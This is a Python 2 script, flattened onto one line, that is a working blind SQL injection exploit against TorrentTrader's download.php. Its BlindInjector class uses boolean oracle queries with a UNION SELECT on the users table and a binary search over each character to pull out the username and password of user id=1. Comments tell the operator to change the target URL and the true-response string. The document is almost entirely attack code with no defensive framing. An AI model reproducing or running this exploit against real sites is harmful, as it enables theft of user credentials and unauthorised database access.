#!/bin/python import urllib, sys requests = 0 class BlindInjector: # the finctions interacting with the remote server, usually you might have to overwrite them def oracle_len_eq(self, thetry): return self.query('%s and length(%s)=%d' % (self.objecttocheck, self.fieldtocheck, thetry)) def oracle_eq(self, p, thetry): return self.query('%s and ord(substring(%s,%d,1))=%d' % (self.objecttocheck, self.fieldtocheck, p, ord(thetry))) def oracle_lt(self, p, thetry): return self.query('%s and ord(substring(%s,%d,1))<%d' % (self.objecttocheck, self.fieldtocheck, p, ord(thetry))) def oracle_gt(self, p, thetry): return self.query('%s and ord(substring(%s,%d,1))>%d' % (self.objecttocheck, self.fieldtocheck, p, ord(thetry))) def searchsub(self, p, testfield): """Search in a subfield (binary search).""" # defensive programming .... if len(testfield) < 1: raise RuntimeError, "Internal Error %r" % testfield if self.oracle_eq(p, testfield[len(testfield)/2]): return testfield[len(testfield)/2] elif self.oracle_lt(p, testfield[len(testfield)/2]): return self.searchsub(p, testfield[:len(testfield)/2]) else: # if self.oracle_gt(p, testfield[len(testfield)/2]): # we gould go without this second check return self.searchsub(p, testfield[len(testfield)/2:]) #else: # raise RuntimeError, "Internal Error" def binsearch(self, testfield = " 0123456789ABCDEFGHIJKLMNOPRSTUVWXYZabcdefghijklmnopqrstuvwxyz"): """Start a binary search""" # find length print "finding fieldlen ...", for l in range(4096): print "\rfinding fieldlen ... %d" % l, sys.stdout.flush() if self.oracle_len_eq(l): break print "\rfinding fieldlen ... %d" % l list(testfield).sort() result = '' for p in range(l): result += self.searchsub(p+1, testfield) print '\r%s' % result, sys.stdout.flush() print return result def query(self, s): global requests """This function checks if a vertain query eveluates to true or not.""" url = self.scriptbase + urllib.quote(self.unionbase + s) print url result = urllib.urlopen(url).read() requests += 1 if self.trueanswer in result: return True else: return False def doit(self): print 'finding %s.%s for %r:' % (self.tabletocheck, self.fieldtocheck, self.objecttocheck) result = self.binsearch() print '%s.%s for %r is %r' % (self.tabletocheck, self.fieldtocheck, self.objecttocheck, result) def __init__(self, fieldtocheck, objecttocheck): # this will identify a page evaluating to true when we do self.query() # you for sure have to change this self.trueanswer = "The ID has been found on the Database, but the torrent" # where we attack # you for sure have to change this self.scriptbase = 'http://127.0.0.1/~md/torrenttrader/download.php?id=1' self.tabletocheck = 'users' self.fieldtocheck = fieldtocheck self.objecttocheck = objecttocheck self.unionbase = " and 0 union select 1 from %s where " % self.tabletocheck self.doit() BlindInjector(fieldtocheck = 'username', objecttocheck = 'id=1') BlindInjector(fieldtocheck = 'password', objecttocheck = 'id=1') print "total %d reqests done" % requests